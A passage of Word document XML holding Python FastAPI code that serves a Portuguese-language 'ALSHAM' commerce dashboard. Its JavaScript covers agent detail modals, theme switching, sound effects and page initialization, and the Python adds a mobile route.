    <w:p w14:paraId="51344F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techniques: ['AutoML', 'Neural Architecture Search', 'Hyperparameter Tuning', 'Feature Engineering']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE8F09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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2962646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learn: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB2F9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name: 'Learn Agent',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731FFF3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icon: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8DC2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color: '#9333EA',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A28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description: 'Sistema de aprendizado auto-evolutivo com modelos de deep learning e transformers',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F4D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techniques: ['Deep Neural Networks', 'Transformer', 'Reinforcement Learning', 'Meta-Learning']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2516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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE228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guard: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DFFE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name: 'Guard Agent',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233CAD7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icon: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D7A46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color: '#00F5FF',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CA7B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description: 'Sistema de segurança e monitoramento com protocolos avançados',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA07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techniques: ['Anomaly Detection', 'Access Control', 'Threat Analysis', 'System Integrity']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273560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45C7A4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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170CF04E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666BAC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data = agentInfo[agentName];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC139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title.innerHTML = `&lt;i class="fas fa-microchip mr-2" style="color: ${data.color};"&gt;&lt;/i&gt;${data.name}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED3D7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2FF861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body.innerHTML = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B49C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class="mb-6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E645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&lt;h3 class="text-lg font-semibold mb-2"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📋</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Descrição&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5213AA3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&lt;p class="text-sm opacity-75"&gt;${data.description}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57760C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66C0A7EC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F6FD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class="mb-6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B65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&lt;h3 class="text-lg font-semibold mb-3"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Técnicas Utilizadas&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3244D07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class="flex flex-wrap gap-2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FEB8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${data.techniques.map(tech =&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF715B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`&lt;span class="px-3 py-1 rounded-full text-xs border border-current opacity-75"&gt;${tech}&lt;/span&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440872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).join('')}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C0F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1C58EC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1A68F51B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478FCB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class="mb-6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72742F4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&lt;h3 class="text-lg font-semibold mb-3"&gt;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Métricas Detalhadas ${realData ? '(Dados Reais)' : '(Cache/Fallback)'}&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E47CF3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class="grid grid-cols-1 md:grid-cols-2 gap-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E5C2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${Object.entries(metrics).map(([key, value]) =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306B5D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`&lt;div class="flex justify-between items-center p-3 rounded-lg" style="background: rgba(255,255,255,0.05);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E006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&lt;span class="text-sm opacity-75"&gt;${key}:&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6D70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    &lt;span class="font-semibold"&gt;${value}&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F40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&lt;/div&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E13731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).join('')}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3330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25E3A3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290DEC05" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16244B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class="mb-6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0972D1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&lt;h3 class="text-lg font-semibold mb-3"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📈</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Histórico de Performance&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CEFE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class="h-32 bg-black bg-opacity-20 rounded-lg flex items-end justify-center space-x-1 p-2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6407DC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${Array.from({length: 20}, (_, i) =&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA342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`&lt;div class="w-2 rounded-t" style="height: ${Math.random() * 80 + 20}%; background: ${data.color};"&gt;&lt;/div&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2959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).join('')}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E90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0815DB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49953460" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0713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&lt;div class="text-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684F4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&lt;div class="inline-flex items-center px-4 py-2 rounded-full" style="background: ${data.color}20; color: ${data.color};"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B48A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&lt;div class="w-2 h-2 bg-current rounded-full mr-2 animate-pulse"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4373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Status: ${realData ? 'Dados Reais - Ativo' : 'Cache/Fallback - Ativo'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A867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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA8434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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A7DA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`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A23F8C3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310B43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modal.classList.add('active');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1825BC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AB205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Play sound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8663E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(window.soundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B3C8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window.soundDesign.play('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C263EF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624A19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4FD3E8C8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9633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function closeModal() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104C003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 modal = document.getElementById('agent-modal');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB182B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modal.classList.remove('active');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF18C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6FA48CBB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B7D4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THEME MANAGER =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254EC2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class ThemeManager {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59930D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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798482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this.currentTheme = 'luxury-glass';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7E29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this.bindEvents();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FBB8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10DCB39C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE329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bindEvents() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC5D9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themeButtons = document.querySelectorAll('.theme-btn');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572C947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themeButtons.forEach(btn =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64486A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btn.addEventListener('click', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4934399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const theme = btn.dataset.theme;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7391462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this.setTheme(theme);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273CC4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61491C8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// Play sound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD791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if (window.soundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505FD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    window.soundDesign.play('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E481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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464D868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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272FCE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7015BBB1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CCE55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Set initial active theme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8FE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this.updateActiveButton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0E005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2A30FCBA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345C38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setTheme(themeName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6F4C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document.body.className = `theme-${themeName}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A3FE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this.currentTheme = themeName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63125C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this.updateActiveButton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526733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5C36E5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Update particles color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410085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(window.particlesSystem) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0471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window.particlesSystem.updateTheme();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617369D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3AFC821" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299D52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// Store preference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138096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localStorage.setItem('dashboard-theme', themeName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E02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65504586" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="538800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updateActiveButton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2384E1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themeButtons = document.querySelectorAll('.theme-btn');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC953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themeButtons.forEach(btn =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A7E3A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btn.classList.toggle('active', btn.dataset.theme === this.currentTheme);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D485B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681A52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4C90E16" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402E496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loadSavedTheme() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC274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const saved = localStorage.getItem('dashboard-theme');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2101A65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(saved) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575683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this.setTheme(saved);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE20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2C2D13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5848CC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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC713F5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5596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INITIALIZATION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318695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document.addEventListener('DOMContentLoaded', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AF2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console.log('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Inicializando ALSHAM GLOBAL COMMERCE Dashboard Supremo COM DADOS REAIS...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719EB68F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CE816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Initialize all systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4878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window.soundDesign = new SoundDesign();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D3C3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window.particlesSystem = new ParticlesSystem();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B83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window.aiInsights = new AIInsights();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2687A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window.wsManager = new WebSocketManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372F49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window.chartManager = new ChartManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2AE9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window.themeManager = new ThemeManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05466083" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F134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Load saved theme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6560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window.themeManager.loadSavedTheme();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B39F9C0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2F2A2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Add hover sounds to cards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7191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document.querySelectorAll('.card-3d').forEach(card =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E232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card.addEventListener('mouseenter', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C71E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(window.soundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF4C3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window.soundDesign.play('hover');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF1BF5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2B4551F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1D65DB1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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67925525" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D966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Add click sounds to buttons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763292B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document.querySelectorAll('button, .cursor-pointer').forEach(element =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3418D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element.addEventListener('click', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A951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(window.soundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A6EA8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window.soundDesign.play('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2280A5B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6177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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0229C1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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1701607D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ADF68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Close modal on escape key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B956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document.addEventListener('keydown', (e) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4803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(e.key === 'Escape') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A83F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closeModal();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4F1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78D339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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4D6746" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="667FE0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// Close modal on background click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CA6F0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document.getElementById('agent-modal').addEventListener('click', (e) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B117A5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(e.target.id === 'agent-modal') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288E40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closeModal();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743C2F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43FC05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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A4EEB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276259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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✨</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dashboard Supremo COM DADOS REAIS inicializado com sucesso!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FF0C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console.log('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Funcionalidades: WebSocket, Particles 3D, Sound Design, AI Insights, 5 Temas');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9846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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏆</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Arquétipo do Mago Visionário implementado');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E639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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NOVIDADE: Modais conectados com dados reais da API!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3262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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📡</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema: WebSocket + HTTP Fallback + Cache inteligente');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E83C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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F781BC2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DCDD2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// ===== PERFORMANCE MONITORING =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15DC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const observer = new PerformanceObserver((list) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6D0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(const entry of list.getEntries()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538E6F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(entry.entryType === 'navigation') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4616F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console.log(`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Tempo de carregamento: ${entry.loadEventEnd - entry.loadEventStart}ms`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DECD1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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513319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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30531D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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9D6F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observer.observe({entryTypes: ['navigation']});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C516A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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0503BC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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4FF49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&lt;/html&gt;"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4567EF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3F653B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return HTMLResponse(content=dashboard_html)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ABFB74" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DA64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# </w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📱</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ROTA MOBILE PWA ADICIONADA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66557B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@app.get("/mobile", response_class=HTMLResponse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78781C2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async def mobile_dashboard():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC19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"""Dashboard PWA mobile - Versão otimizada para dispositivos móveis"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C9F7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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2D5F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with open('dashboard_mobile.html', 'r', encoding='utf-8') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAB5D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mobile_html = file.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39AB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HTMLResponse(content=mobile_html)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E736D4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except FileNotFoundError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3381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Fallback para versão desktop se mobile não existir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF438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return await dashboard()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131F8C0E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C4CB8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__name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6652924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port = int(os.environ.get("PORT", 8080))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C3BA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7D811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print("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Iniciando SUNA-ALSHAM COM CONTADOR DE CICLOS CORRIGIDO na porta", port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172FE53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print("</w:t>
      </w:r>
